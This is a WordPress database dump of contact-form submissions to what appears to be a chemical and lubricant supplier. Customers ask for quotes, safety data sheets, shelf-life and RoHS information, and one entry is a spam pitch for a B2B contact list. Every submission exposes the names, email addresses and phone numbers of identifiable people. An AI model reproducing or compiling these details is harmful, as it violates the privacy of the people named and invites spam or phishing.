INSERT INTO `wp_postmeta` VALUES (34149, 3828, '_field_1', 'Daniel Foo Kee Wei'); 
INSERT INTO `wp_postmeta` VALUES (34150, 3828, '_field_10', 'KVC Industrial Supplies Sdn Bhd'); 
INSERT INTO `wp_postmeta` VALUES (34151, 3828, '_field_2', 'kw.foo@kvc.com.my'); 
INSERT INTO `wp_postmeta` VALUES (34152, 3828, '_field_8', '(601) 240-2073'); 
INSERT INTO `wp_postmeta` VALUES (34153, 3828, '_field_3', 'Dear Sales Dept,\r\n\r\nKindly quote me\r\n\r\n1. Miller Stephenson MS-122AD---2 Can'); 
INSERT INTO `wp_postmeta` VALUES (34154, 3828, '_field_4', ''); 
INSERT INTO `wp_postmeta` VALUES (34155, 3828, '_sub_id', '3828'); 
INSERT INTO `wp_postmeta` VALUES (34156, 3829, '_form_id', '1'); 
INSERT INTO `wp_postmeta` VALUES (34157, 3829, '_seq_num', '415'); 
INSERT INTO `wp_postmeta` VALUES (34158, 3829, '_action', 'submit'); 
INSERT INTO `wp_postmeta` VALUES (34159, 3829, '_field_26', '&lt;BR&gt;\r\nPlease Fill out the form below for further info:\r\n&lt;BR&gt;'); 
INSERT INTO `wp_postmeta` VALUES (34160, 3829, '_field_1', 'PRIYA M'); 
INSERT INTO `wp_postmeta` VALUES (34161, 3829, '_field_10', 'UMAC AVIONICS PTE LIMITED'); 
INSERT INTO `wp_postmeta` VALUES (34162, 3829, '_field_2', 'tech@umacintl.com'); 
INSERT INTO `wp_postmeta` VALUES (34163, 3829, '_field_8', '(656) 846-4085'); 
INSERT INTO `wp_postmeta` VALUES (34164, 3829, '_field_3', 'Dear Janet Stephens,\r\nPlease confirm the Date of Mfg.&amp; date of expiry for the below Item.\r\n\r\nSl No	Item Name	Part No	MAKE	Qty	Your Price\r\n1	URETHANE BASED CONFORMAL COATING PACK SIZE : 1GALLON	MS-472C 	MILLER-STEPHENSON	2 Nos	\r\n2	CONFORMAL COATING STRIPPER PART \r\nPACK SIZE : 1GALLON	MS-114C OR MS-115	MILLER-STEPHENSON	2 Nos	\r\n\r\nPriya\r\nUMAC AVIONICS PTE LIMITED\r\n391B ORCHARD ROAD\r\n#23-01 NGEE ANN CITY TOWER B,\r\nSINGAPORE - 238874.\r\nTelefax : +65 68464085\r\nwww.umacintl.com\r\nEmail: tech@umacintl.com \r\n'); 
INSERT INTO `wp_postmeta` VALUES (34165, 3829, '_field_4', ''); 
INSERT INTO `wp_postmeta` VALUES (34166, 3829, '_sub_id', '3829'); 
INSERT INTO `wp_postmeta` VALUES (34167, 3830, '_form_id', '1'); 
INSERT INTO `wp_postmeta` VALUES (34168, 3830, '_seq_num', '416'); 
INSERT INTO `wp_postmeta` VALUES (34169, 3830, '_action', 'submit'); 
INSERT INTO `wp_postmeta` VALUES (34170, 3830, '_field_26', '&lt;BR&gt;\r\nPlease Fill out the form below for further info:\r\n&lt;BR&gt;'); 
INSERT INTO `wp_postmeta` VALUES (34171, 3830, '_field_1', 'John Lutz'); 
INSERT INTO `wp_postmeta` VALUES (34172, 3830, '_field_10', 'Medtronic'); 
INSERT INTO `wp_postmeta` VALUES (34173, 3830, '_field_2', 'john.r.lutz@medtronic.com'); 
INSERT INTO `wp_postmeta` VALUES (34174, 3830, '_field_8', ''); 
INSERT INTO `wp_postmeta` VALUES (34175, 3830, '_field_3', 'I am working on a project that involves the Aero-Duster MS-222N. I am in need of information on whether or not this product has an expiration date. Can you please provide this information? I have looked at the info supplied on the website and this is not covered.'); 
INSERT INTO `wp_postmeta` VALUES (34176, 3830, '_field_4', ''); 
INSERT INTO `wp_postmeta` VALUES (34177, 3830, '_sub_id', '3830'); 
INSERT INTO `wp_postmeta` VALUES (34178, 3831, '_form_id', '1'); 
INSERT INTO `wp_postmeta` VALUES (34179, 3831, '_seq_num', '417'); 
INSERT INTO `wp_postmeta` VALUES (34180, 3831, '_action', 'submit'); 
INSERT INTO `wp_postmeta` VALUES (34181, 3831, '_field_26', '&lt;BR&gt;\r\nPlease Fill out the form below for further info:\r\n&lt;BR&gt;'); 
INSERT INTO `wp_postmeta` VALUES (34182, 3831, '_field_1', 'Rizwana Sultan'); 
INSERT INTO `wp_postmeta` VALUES (34183, 3831, '_field_10', 'Aeropanel Corporation'); 
INSERT INTO `wp_postmeta` VALUES (34184, 3831, '_field_2', 'rsultan@aeropanel.com'); 
INSERT INTO `wp_postmeta` VALUES (34185, 3831, '_field_8', '973-335-9636 x 11'); 
INSERT INTO `wp_postmeta` VALUES (34186, 3831, '_field_3', 'Please quote,\r\n1)    Conformal Coating, Acrylic Type AR per IPC-CC-830 and certified to UL94 V-0\r\n'); 
INSERT INTO `wp_postmeta` VALUES (34187, 3831, '_field_4', ''); 
INSERT INTO `wp_postmeta` VALUES (34188, 3831, '_sub_id', '3831'); 
INSERT INTO `wp_postmeta` VALUES (34189, 3832, '_form_id', '1'); 
INSERT INTO `wp_postmeta` VALUES (34190, 3832, '_seq_num', '418'); 
INSERT INTO `wp_postmeta` VALUES (34191, 3832, '_action', 'submit'); 
INSERT INTO `wp_postmeta` VALUES (34192, 3832, '_field_26', '&lt;BR&gt;\r\nPlease Fill out the form below for further info:\r\n&lt;BR&gt;'); 
INSERT INTO `wp_postmeta` VALUES (34193, 3832, '_field_1', 'MITCHELL TENNANT'); 
INSERT INTO `wp_postmeta` VALUES (34194, 3832, '_field_10', 'GC COMPONENTS LTD'); 
INSERT INTO `wp_postmeta` VALUES (34195, 3832, '_field_2', 'mitchell@gccomponents.co.uk'); 
INSERT INTO `wp_postmeta` VALUES (34196, 3832, '_field_8', '(441) 443-8166'); 
INSERT INTO `wp_postmeta` VALUES (34197, 3832, '_field_3', 'Please can you advise if you are able to quote me the pricing and delivery time for the following item to myself in the UK:\r\n\r\n      Item:   35RN75 (MS-907)\r\n        Qty:   1 PACK'); 
INSERT INTO `wp_postmeta` VALUES (34198, 3832, '_field_4', ''); 
INSERT INTO `wp_postmeta` VALUES (34199, 3832, '_sub_id', '3832'); 
INSERT INTO `wp_postmeta` VALUES (34200, 3833, '_form_id', '11'); 
INSERT INTO `wp_postmeta` VALUES (34201, 3833, '_seq_num', '248'); 
INSERT INTO `wp_postmeta` VALUES (34202, 3833, '_action', 'submit'); 
INSERT INTO `wp_postmeta` VALUES (34203, 3833, '_field_12', 'Lukas Baumann'); 
INSERT INTO `wp_postmeta` VALUES (34204, 3833, '_field_13', 'Folex AG'); 
INSERT INTO `wp_postmeta` VALUES (34205, 3833, '_field_18', ''); 
INSERT INTO `wp_postmeta` VALUES (34206, 3833, '_field_14', 'lukas.baumann@folex.ch'); 
INSERT INTO `wp_postmeta` VALUES (34207, 3833, '_field_15', ''); 
INSERT INTO `wp_postmeta` VALUES (34208, 3833, '_field_16', 'Dear Sir or Madame\nFor a new project we are looking for a release agent that has good adherence to PET but provides good release for epoxies. Do you have such a release agent?\n\nMany thanks for your support\nKind regards\nLukas Baumann\n'); 
INSERT INTO `wp_postmeta` VALUES (34209, 3833, '_field_17', ''); 
INSERT INTO `wp_postmeta` VALUES (34210, 3833, '_sub_id', '3833'); 
INSERT INTO `wp_postmeta` VALUES (34211, 3834, '_form_id', '1'); 
INSERT INTO `wp_postmeta` VALUES (34212, 3834, '_seq_num', '419'); 
INSERT INTO `wp_postmeta` VALUES (34213, 3834, '_action', 'submit'); 
INSERT INTO `wp_postmeta` VALUES (34214, 3834, '_field_26', '&lt;BR&gt;\r\nPlease Fill out the form below for further info:\r\n&lt;BR&gt;'); 
INSERT INTO `wp_postmeta` VALUES (34215, 3834, '_field_1', 'Brandon'); 
INSERT INTO `wp_postmeta` VALUES (34216, 3834, '_field_10', 'Pacific Aero Tech'); 
INSERT INTO `wp_postmeta` VALUES (34217, 3834, '_field_2', 'Brandon@pacificaerotech.com'); 
INSERT INTO `wp_postmeta` VALUES (34218, 3834, '_field_8', '(253) 395-9535'); 
INSERT INTO `wp_postmeta` VALUES (34219, 3834, '_field_3', 'Hello, I am inquiring about the shelf life on one of your products. the product is your PTFE release agent MS-122XD. We have currently been using the warranty exp. date that is listed on the COC that we receive. Is this correct?\n\nThank you for your time\n\nBrandon'); 
INSERT INTO `wp_postmeta` VALUES (34220, 3834, '_field_4', ''); 
INSERT INTO `wp_postmeta` VALUES (34221, 3834, '_sub_id', '3834'); 
INSERT INTO `wp_postmeta` VALUES (34222, 3835, '_form_id', '1'); 
INSERT INTO `wp_postmeta` VALUES (34223, 3835, '_seq_num', '420'); 
INSERT INTO `wp_postmeta` VALUES (34224, 3835, '_action', 'submit'); 
INSERT INTO `wp_postmeta` VALUES (34225, 3835, '_field_26', '&lt;BR&gt;\r\nPlease Fill out the form below for further info:\r\n&lt;BR&gt;'); 
INSERT INTO `wp_postmeta` VALUES (34226, 3835, '_field_1', 'Maxime Lussier'); 
INSERT INTO `wp_postmeta` VALUES (34227, 3835, '_field_10', 'CAE Inc.'); 
INSERT INTO `wp_postmeta` VALUES (34228, 3835, '_field_2', 'maxime.lussier@cae.com'); 
INSERT INTO `wp_postmeta` VALUES (34229, 3835, '_field_8', '(514) 341-2000'); 
INSERT INTO `wp_postmeta` VALUES (34230, 3835, '_field_3', 'To whom it may concern,\r\n\r\nWe are currently in the process of reviewing the contents of our parts database for RoHS compliance. Could you please confirm if EPOXY MS-907 is compliant with RoHS and provide a certificate if applicable?\r\n\r\nBest Regards,\r\n\r\nMaxime Lussier\r\nIntern, Component engineering\r\nCAE Inc.'); 
INSERT INTO `wp_postmeta` VALUES (34231, 3835, '_field_4', ''); 
INSERT INTO `wp_postmeta` VALUES (34232, 3835, '_sub_id', '3835'); 
INSERT INTO `wp_postmeta` VALUES (34233, 3836, '_form_id', '1'); 
INSERT INTO `wp_postmeta` VALUES (34234, 3836, '_seq_num', '421'); 
INSERT INTO `wp_postmeta` VALUES (34235, 3836, '_action', 'submit'); 
INSERT INTO `wp_postmeta` VALUES (34236, 3836, '_field_26', '&lt;BR&gt;\r\nPlease Fill out the form below for further info:\r\n&lt;BR&gt;'); 
INSERT INTO `wp_postmeta` VALUES (34237, 3836, '_field_1', 'Dale Lundquist'); 
INSERT INTO `wp_postmeta` VALUES (34238, 3836, '_field_10', 'Harley-Davidson'); 
INSERT INTO `wp_postmeta` VALUES (34239, 3836, '_field_2', 'dale.lundquist@harley-davidson.com'); 
INSERT INTO `wp_postmeta` VALUES (34240, 3836, '_field_8', ''); 
INSERT INTO `wp_postmeta` VALUES (34241, 3836, '_field_3', 'Good Afternoon,\r\n\r\nMy name is Dale Lundquist and I work for Harley-Davidson in Milwaukee, WI.  We recently went through a chemical audit at our facilities and there were a few products that we had on hand from Miller-Stephenson that we did not have MSDS/SDS sheets for.  Some of the products like fairly old so they may be discontinued.  I was wondering if you would be able to provide me the MSDS or SDS for the below product so that we can have the proper documentation on hand.\r\n\r\n- MS-460/22 SILICONE CONFORMAL COATING\r\n- MS-941/CO2 SAFEZONE PRECISION CLEANING SOLVENT\r\n\r\nYour assistance would be much appreciated.\r\n\r\nThanks,\r\n\r\nDale Lundquist\r\n'); 
INSERT INTO `wp_postmeta` VALUES (34242, 3836, '_field_4', ''); 
INSERT INTO `wp_postmeta` VALUES (34243, 3836, '_sub_id', '3836'); 
INSERT INTO `wp_postmeta` VALUES (34244, 3837, '_form_id', '1'); 
INSERT INTO `wp_postmeta` VALUES (34245, 3837, '_seq_num', '422'); 
INSERT INTO `wp_postmeta` VALUES (34246, 3837, '_action', 'submit'); 
INSERT INTO `wp_postmeta` VALUES (34247, 3837, '_field_26', '&lt;BR&gt;\r\nPlease Fill out the form below for further info:\r\n&lt;BR&gt;'); 
INSERT INTO `wp_postmeta` VALUES (34248, 3837, '_field_1', 'Darrell Snader'); 
INSERT INTO `wp_postmeta` VALUES (34249, 3837, '_field_10', 'Ultra Herley Lancaster'); 
INSERT INTO `wp_postmeta` VALUES (34250, 3837, '_field_2', 'darrell.snader@ultra-herley.com'); 
INSERT INTO `wp_postmeta` VALUES (34251, 3837, '_field_8', '(717) 397-2777'); 
INSERT INTO `wp_postmeta` VALUES (34252, 3837, '_field_3', 'I am looking for a conformal coating product that I could use on microwave circuitry up in the 18 GHz range. Do you make any coatings that would have low loss at microwave frequencies?\r\n\r\nThanks!'); 
INSERT INTO `wp_postmeta` VALUES (34253, 3837, '_field_4', ''); 
INSERT INTO `wp_postmeta` VALUES (34254, 3837, '_sub_id', '3837'); 
INSERT INTO `wp_postmeta` VALUES (34255, 3838, '_form_id', '11'); 
INSERT INTO `wp_postmeta` VALUES (34256, 3838, '_seq_num', '249'); 
INSERT INTO `wp_postmeta` VALUES (34257, 3838, '_action', 'submit'); 
INSERT INTO `wp_postmeta` VALUES (34258, 3838, '_field_12', 'Robert Lavin'); 
INSERT INTO `wp_postmeta` VALUES (34259, 3838, '_field_13', 'Transducers Direct LLC'); 
INSERT INTO `wp_postmeta` VALUES (34260, 3838, '_field_18', ''); 
INSERT INTO `wp_postmeta` VALUES (34261, 3838, '_field_14', 'bob_lavin@transducersdirect.com'); 
INSERT INTO `wp_postmeta` VALUES (34262, 3838, '_field_15', '(513) 583-9491'); 
INSERT INTO `wp_postmeta` VALUES (34263, 3838, '_field_16', 'I am looking for a cleaner for 303 Stainless Steel.  I will not be using a vapor degreaser.\r\n\r\nI need to clean parts for Oxygen service.'); 
INSERT INTO `wp_postmeta` VALUES (34264, 3838, '_field_17', ''); 
INSERT INTO `wp_postmeta` VALUES (34265, 3838, '_sub_id', '3838'); 
INSERT INTO `wp_postmeta` VALUES (34266, 3839, '_form_id', '1'); 
INSERT INTO `wp_postmeta` VALUES (34267, 3839, '_seq_num', '423'); 
INSERT INTO `wp_postmeta` VALUES (34268, 3839, '_action', 'submit'); 
INSERT INTO `wp_postmeta` VALUES (34269, 3839, '_field_26', '&lt;BR&gt;\r\nPlease Fill out the form below for further info:\r\n&lt;BR&gt;'); 
INSERT INTO `wp_postmeta` VALUES (34270, 3839, '_field_1', 'Geoffrey MESMIN'); 
INSERT INTO `wp_postmeta` VALUES (34271, 3839, '_field_10', 'GGB'); 
INSERT INTO `wp_postmeta` VALUES (34272, 3839, '_field_2', 'geoffrey.mesmin@ggbearings.com'); 
INSERT INTO `wp_postmeta` VALUES (34273, 3839, '_field_8', '(334) 503-3664'); 
INSERT INTO `wp_postmeta` VALUES (34274, 3839, '_field_3', 'Good morning,\r\n\r\nWe are currently working on a filled epoxy resin ( very high Tg) filled with short fiber up to 60wt%.\r\n\r\nWe are interesting in adding fillers such as your silica or any other wetting agent in order to improve the wetting and the homogeneity  in our SMC process.\r\n\r\nCould you please, send us a small sample of your product ? \r\nDo you have any other suggestions ?\r\n\r\nDo not hesitate if you have any questions.\r\nThanks in advance,\r\n\r\nBest regards,\r\n\r\nMESMIN Geoffrey\r\nApprentice Engineer R&amp;D\r\n\r\n GGB France EURL\r\n65 chemin de la prairie\r\nBP 2074\r\n74000 Annecy\r\nFrance\r\nTel : +33 (0) 4.50.33.66.88\r\nExtension : 6316\r\ngeoffrey.mesmin@ggbearings.com\r\nhttp://www.ggbearings.com\r\n'); 
INSERT INTO `wp_postmeta` VALUES (34275, 3839, '_field_4', ''); 
INSERT INTO `wp_postmeta` VALUES (34276, 3839, '_sub_id', '3839'); 
INSERT INTO `wp_postmeta` VALUES (34277, 3840, '_form_id', '1'); 
INSERT INTO `wp_postmeta` VALUES (34278, 3840, '_seq_num', '424'); 
INSERT INTO `wp_postmeta` VALUES (34279, 3840, '_action', 'submit'); 
INSERT INTO `wp_postmeta` VALUES (34280, 3840, '_field_26', '&lt;BR&gt;\r\nPlease Fill out the form below for further info:\r\n&lt;BR&gt;'); 
INSERT INTO `wp_postmeta` VALUES (34281, 3840, '_field_1', 'Mike Cooper'); 
INSERT INTO `wp_postmeta` VALUES (34282, 3840, '_field_10', 'Sigro Precision'); 
INSERT INTO `wp_postmeta` VALUES (34283, 3840, '_field_2', 'mike@sigroprecision.com'); 
INSERT INTO `wp_postmeta` VALUES (34284, 3840, '_field_8', '(631) 253-2724'); 
INSERT INTO `wp_postmeta` VALUES (34285, 3840, '_field_3', 'Looking for a pint of EPON 828- please advise cost and availability and also whether C of C and shelf life data included.\n\nThank you\n\nMike Cooper\nSigro Precision'); 
INSERT INTO `wp_postmeta` VALUES (34286, 3840, '_field_4', ''); 
INSERT INTO `wp_postmeta` VALUES (34287, 3840, '_sub_id', '3840'); 
INSERT INTO `wp_postmeta` VALUES (34288, 3841, '_form_id', '1'); 
INSERT INTO `wp_postmeta` VALUES (34289, 3841, '_seq_num', '425'); 
INSERT INTO `wp_postmeta` VALUES (34290, 3841, '_action', 'submit'); 
INSERT INTO `wp_postmeta` VALUES (34291, 3841, '_field_26', '&lt;BR&gt;\r\nPlease Fill out the form below for further info:\r\n&lt;BR&gt;'); 
INSERT INTO `wp_postmeta` VALUES (34292, 3841, '_field_1', 'Nick Paritte'); 
INSERT INTO `wp_postmeta` VALUES (34293, 3841, '_field_10', ''); 
INSERT INTO `wp_postmeta` VALUES (34294, 3841, '_field_2', 'TackleAdvisors@gmail.com'); 
INSERT INTO `wp_postmeta` VALUES (34295, 3841, '_field_8', '(732) 236-8088'); 
INSERT INTO `wp_postmeta` VALUES (34296, 3841, '_field_3', 'Good day and thank you for your time.\r\n\r\nIs it possible to obtain a sample of your 225 and 205 product to compare?  It&#039;s only use is going to be for fishing reels.  And honestly it&#039;s quite expensive to purchase both just to find which I prefer.\r\n\r\nThank you\r\nNick'); 
INSERT INTO `wp_postmeta` VALUES (34297, 3841, '_field_4', ''); 
INSERT INTO `wp_postmeta` VALUES (34298, 3841, '_sub_id', '3841'); 
INSERT INTO `wp_postmeta` VALUES (34299, 3842, '_form_id', '1'); 
INSERT INTO `wp_postmeta` VALUES (34300, 3842, '_seq_num', '426'); 
INSERT INTO `wp_postmeta` VALUES (34301, 3842, '_action', 'submit'); 
INSERT INTO `wp_postmeta` VALUES (34302, 3842, '_field_26', '&lt;BR&gt;\r\nPlease Fill out the form below for further info:\r\n&lt;BR&gt;'); 
INSERT INTO `wp_postmeta` VALUES (34303, 3842, '_field_1', 'John Daniel'); 
INSERT INTO `wp_postmeta` VALUES (34304, 3842, '_field_10', 'VelocityEHS'); 
INSERT INTO `wp_postmeta` VALUES (34305, 3842, '_field_2', 'jdaniel@ehs.com'); 
INSERT INTO `wp_postmeta` VALUES (34306, 3842, '_field_8', '(312) 881-2362'); 
INSERT INTO `wp_postmeta` VALUES (34307, 3842, '_field_3', 'Hello,\r\n\r\nI&#039;m looking for a Safety Data Sheet for &quot;MS-136A RELEASE AGENT - HOT MOLDS&quot;.\r\n\r\n'); 
INSERT INTO `wp_postmeta` VALUES (34308, 3842, '_field_4', ''); 
INSERT INTO `wp_postmeta` VALUES (34309, 3842, '_sub_id', '3842'); 
INSERT INTO `wp_postmeta` VALUES (34310, 3843, '_form_id', '1'); 
INSERT INTO `wp_postmeta` VALUES (34311, 3843, '_seq_num', '427'); 
INSERT INTO `wp_postmeta` VALUES (34312, 3843, '_action', 'submit'); 
INSERT INTO `wp_postmeta` VALUES (34313, 3843, '_field_26', '&lt;BR&gt;\r\nPlease Fill out the form below for further info:\r\n&lt;BR&gt;'); 
INSERT INTO `wp_postmeta` VALUES (34314, 3843, '_field_1', 'EFRAIN TORRES'); 
INSERT INTO `wp_postmeta` VALUES (34315, 3843, '_field_10', 'MEFASA'); 
INSERT INTO `wp_postmeta` VALUES (34316, 3843, '_field_2', 'e.torres@mefasa.org'); 
INSERT INTO `wp_postmeta` VALUES (34317, 3843, '_field_8', ''); 
INSERT INTO `wp_postmeta` VALUES (34318, 3843, '_field_3', 'Could you please send me Safety date sheet of this product\r\nMS-122AD  mold release\r\n\r\nThank you'); 
INSERT INTO `wp_postmeta` VALUES (34319, 3843, '_field_4', ''); 
INSERT INTO `wp_postmeta` VALUES (34320, 3843, '_sub_id', '3843'); 
INSERT INTO `wp_postmeta` VALUES (34321, 3844, '_form_id', '1'); 
INSERT INTO `wp_postmeta` VALUES (34322, 3844, '_seq_num', '428'); 
INSERT INTO `wp_postmeta` VALUES (34323, 3844, '_action', 'submit'); 
INSERT INTO `wp_postmeta` VALUES (34324, 3844, '_field_26', '&lt;BR&gt;\r\nPlease Fill out the form below for further info:\r\n&lt;BR&gt;'); 
INSERT INTO `wp_postmeta` VALUES (34325, 3844, '_field_1', 'Amy Jackson'); 
INSERT INTO `wp_postmeta` VALUES (34326, 3844, '_field_10', 'Contact List Inc.'); 
INSERT INTO `wp_postmeta` VALUES (34327, 3844, '_field_2', 'amy.jackson@bizprospective.com'); 
INSERT INTO `wp_postmeta` VALUES (34328, 3844, '_field_8', '(215) 475-9835'); 
INSERT INTO `wp_postmeta` VALUES (34329, 3844, '_field_3', 'Sub: Electric and Hybrid Industry Professionals List\r\n\r\nHi,\r\n\r\nHope you doing well!\r\n\r\nCurious to know if you would be interested in acquiring updated and tele verified B2B database of Electric and Hybrid Industry for your upcoming marketing promotions.\r\n\r\nDatabase consists of:  Name, Company, Job Title, Website, Physical Address, Employees, Revenue, Industry, SIC, Phone Number and Verified/Opt-In Email Address.\r\nData sources: Tradeshows, Business directories, online magazine subscription, yellow pages etc.\r\nList Format: XLS\r\nOur Services: E mail Lists, E mail Appending, Custom List Building, and Campaign\r\n\r\nJob titles:\r\n\r\n•	Academic\r\n•	Business Development/Sales\r\n•	CEO/ President/ MD\r\n•	CTO/ Technical Lead\r\n•	Consultant /engineering\r\n•	Finance /Marketing\r\n•	Other /Purchasing\r\n•	Research &amp; Development\r\n\r\nSegments:\r\n\r\n•	Automotive Manufacturer\r\n•	Batter Manufacturer/integrator\r\n•	Charging Station Manufacturer\r\n•	Charging Station Operator\r\n•	Connectors / Cables\r\n•	Components Supplier / Consultant\r\n•	Design and Simulation / Education\r\n•	Engineering Services\r\n•	Manufacturing Equipment\r\n•	Material Supplier / Other\r\n•	Power Management\r\n•	Research &amp; Development\r\n•	Testing Equipment Supplier\r\n•	Testing and Certification Services\r\n\r\nPlease let me know your thoughts. So that I can send you few samples to check our database accuracy along with counts and pricing.\r\n\r\nTarget Criteria:-\r\n\r\nTarget Industry: _____________; (Any)    \r\nTarget Geography: ______________; (USA, UK, Across the World)     \r\nTarget Job Title:   _________________; (CEO, CFO, CMO, VP etc.)\r\n\r\nI will look forward to hear from you soon.\r\n\r\nKind Regards,\r\nAmy Jackson | Online Marketing Specialist\r\nLead Generation Team (USA/UK/Europe)\r\n________________________________________\r\nTo remove from this mailing: reply with subject line as &quot;Leave out&quot; and indicate your email address to be removed from our database.\r\n\r\n\r\n\r\n'); 
INSERT INTO `wp_postmeta` VALUES (34330, 3844, '_field_4', ''); 
INSERT INTO `wp_postmeta` VALUES (34331, 3844, '_sub_id', '3844'); 
INSERT INTO `wp_postmeta` VALUES (34332, 3845, '_form_id', '1'); 
INSERT INTO `wp_postmeta` VALUES (34333, 3845, '_seq_num', '429'); 
INSERT INTO `wp_postmeta` VALUES (34334, 3845, '_action', 'submit'); 
INSERT INTO `wp_postmeta` VALUES (34335, 3845, '_field_26', '&lt;BR&gt;\r\nPlease Fill out the form below for further info:\r\n&lt;BR&gt;'); 
INSERT INTO `wp_postmeta` VALUES (34336, 3845, '_field_1', 'KIM MESSERSCHMIDT'); 
INSERT INTO `wp_postmeta` VALUES (34337, 3845, '_field_10', 'MKS - Newport Corp'); 
INSERT INTO `wp_postmeta` VALUES (34338, 3845, '_field_2', 'kim.messerschmidt@newport.com'); 
INSERT INTO `wp_postmeta` VALUES (34339, 3845, '_field_8', '(949) 253-1926'); 
INSERT INTO `wp_postmeta` VALUES (34340, 3845, '_field_3', 'Is Krytox - LVP Grease RoHS Compliant?\r\nCan you send me a RoHS certificate?\r\n\r\nthx, Kim'); 
INSERT INTO `wp_postmeta` VALUES (34341, 3845, '_field_4', ''); 
INSERT INTO `wp_postmeta` VALUES (34342, 3845, '_sub_id', '3845'); 
INSERT INTO `wp_postmeta` VALUES (34343, 3846, '_form_id', '1'); 
INSERT INTO `wp_postmeta` VALUES (34344, 3846, '_seq_num', '430'); 
INSERT INTO `wp_postmeta` VALUES (34345, 3846, '_action', 'submit'); 
INSERT INTO `wp_postmeta` VALUES (34346, 3846, '_field_26', '&lt;BR&gt;\r\nPlease Fill out the form below for further info:\r\n&lt;BR&gt;'); 
INSERT INTO `wp_postmeta` VALUES (34347, 3846, '_field_1', 'Rodrigo Aguilar'); 
INSERT INTO `wp_postmeta` VALUES (34348, 3846, '_field_10', 'Fastenal Company'); 
INSERT INTO `wp_postmeta` VALUES (34349, 3846, '_field_2', 'CA026@stores.fastenal.com'); 
INSERT INTO `wp_postmeta` VALUES (34350, 3846, '_field_8', '(714) 955-2406'); 
INSERT INTO `wp_postmeta` VALUES (34351, 3846, '_field_3', 'New onsite location. Can you please quote the following. MIL43-MS-122AD. Quote quantity by case.\r\nThank you!'); 
INSERT INTO `wp_postmeta` VALUES (34352, 3846, '_field_4', ''); 
INSERT INTO `wp_postmeta` VALUES (34353, 3846, '_sub_id', '3846'); 
INSERT INTO `wp_postmeta` VALUES (34354, 3847, '_form_id', '1'); 
INSERT INTO `wp_postmeta` VALUES (34355, 3847, '_seq_num', '431'); 
INSERT INTO `wp_postmeta` VALUES (34356, 3847, '_action', 'submit'); 
INSERT INTO `wp_postmeta` VALUES (34357, 3847, '_field_26', '&lt;BR&gt;\r\nPlease Fill out the form below for further info:\r\n&lt;BR&gt;'); 
INSERT INTO `wp_postmeta` VALUES (34358, 3847, '_field_1', 'Dave'); 
INSERT INTO `wp_postmeta` VALUES (34359, 3847, '_field_10', 'American asphalt paving'); 
INSERT INTO `wp_postmeta` VALUES (34360, 3847, '_field_2', 'dahrut@msn.com'); 
INSERT INTO `wp_postmeta` VALUES (34361, 3847, '_field_8', ''); 
INSERT INTO `wp_postmeta` VALUES (34362, 3847, '_field_3', 'I&#039;m trying to use a older hood made out of fiberglass, painted. as a mold. Is it possible to use an release agent of yours, that will not damage the finish of the old hood ?   \r\nany suggestion would be appreciated.\r\nThank You,\r\nDave  '); 
INSERT INTO `wp_postmeta` VALUES (34363, 3847, '_field_4', ''); 
INSERT INTO `wp_postmeta` VALUES (34364, 3847, '_sub_id', '3847'); 
INSERT INTO `wp_postmeta` VALUES (34365, 3848, '_form_id', '1'); 
INSERT INTO `wp_postmeta` VALUES (34366, 3848, '_seq_num', '432'); 
INSERT INTO `wp_postmeta` VALUES (34367, 3848, '_action', 'submit'); 
INSERT INTO `wp_postmeta` VALUES (34368, 3848, '_field_26', '&lt;BR&gt;\r\nPlease Fill out the form below for further info:\r\n&lt;BR&gt;'); 
INSERT INTO `wp_postmeta` VALUES (34369, 3848, '_field_1', 'PRIYA M'); 
INSERT INTO `wp_postmeta` VALUES (34370, 3848, '_field_10', 'UMAC AVIONICS PTE LIMITED'); 
INSERT INTO `wp_postmeta` VALUES (34371, 3848, '_field_2', 'tech@umacintl.com'); 
INSERT INTO `wp_postmeta` VALUES (34372, 3848, '_field_8', '(656) 846-4085'); 
INSERT INTO `wp_postmeta` VALUES (34373, 3848, '_field_3', 'Dear Janet Stephens,\r\nPlease confirm the Date of Mfg.&amp; date of expiry for RFQ 161790 the below Item. you had quoted for 2 gallons\r\nSl No Item Name Part No MAKE Qty Your Price\r\n1 URETHANE BASED CONFORMAL COATING PACK SIZE : 1GALLON MS-472C MILLER-STEPHENSON 2 Nos\r\n2 CONFORMAL COATING STRIPPER PART\r\nPACK SIZE : 1GALLON MS-114C OR MS-115 MILLER-STEPHENSON 2 Nos \r\nPriya\r\nUMAC AVIONICS PTE LIMITED\r\n391B ORCHARD ROAD\r\n#23-01 NGEE ANN CITY TOWER B,\r\nSINGAPORE - 238874.\r\nTelefax : +65 68464085\r\nwww.umacintl.com\r\nEmail: tech@umacintl.com \r\n'); 
INSERT INTO `wp_postmeta` VALUES (34374, 3848, '_field_4', ''); 
INSERT INTO `wp_postmeta` VALUES (34375, 3848, '_sub_id', '3848'); 
INSERT INTO `wp_postmeta` VALUES (34376, 3850, '_wp_attached_file', '2017/03/Krytox-280-series.pdf'); 
INSERT INTO `wp_postmeta` VALUES (34377, 3852, '_form_id', '11'); 
INSERT INTO `wp_postmeta` VALUES (34378, 3852, '_seq_num', '250'); 
INSERT INTO `wp_postmeta` VALUES (34379, 3852, '_action', 'submit'); 
INSERT INTO `wp_postmeta` VALUES (34380, 3852, '_field_12', 'Asa Eckert-Erdheim'); 
INSERT INTO `wp_postmeta` VALUES (34381, 3852, '_field_13', 'Harvard University'); 
INSERT INTO `wp_postmeta` VALUES (34382, 3852, '_field_18', ''); 
INSERT INTO `wp_postmeta` VALUES (34383, 3852, '_field_14', 'Asa.Eckert-Erdheim@wyss.harvard.edu'); 
INSERT INTO `wp_postmeta` VALUES (34384, 3852, '_field_15', ''); 
INSERT INTO `wp_postmeta` VALUES (34385, 3852, '_field_16', 'Hello.\r\n\r\nI was hoping to get some recommendations for Krytox greases to be used a Helicon gear box. I have been looking at GPL 215, 250, and the XP2 series but am struggling to find information regarding the differences between each. This is lubricating a gearbox with pinion speeds up to 10000RPM and gear speeds of up to 280 RPM (36:1 reduction). Max force transmitted by the gear teeth is 1000N. \r\n\r\nAdditionally, is it advisable to mix Krytox greases? There are open bearings operating in close proximity to the gears, so they need to be lubricated with either the same grease or a compatible one. If any of these greases are functional in a bearing at 10000RPM, we can use the same lubricant.\r\n\r\nThank you,\r\n\r\nAsa'); 
INSERT INTO `wp_postmeta` VALUES (34386, 3852, '_field_17', ''); 
INSERT INTO `wp_postmeta` VALUES (34387, 3852, '_sub_id', '3852'); 
INSERT INTO `wp_postmeta` VALUES (34388, 3853, '_form_id', '1'); 
INSERT INTO `wp_postmeta` VALUES (34389, 3853, '_seq_num', '433'); 
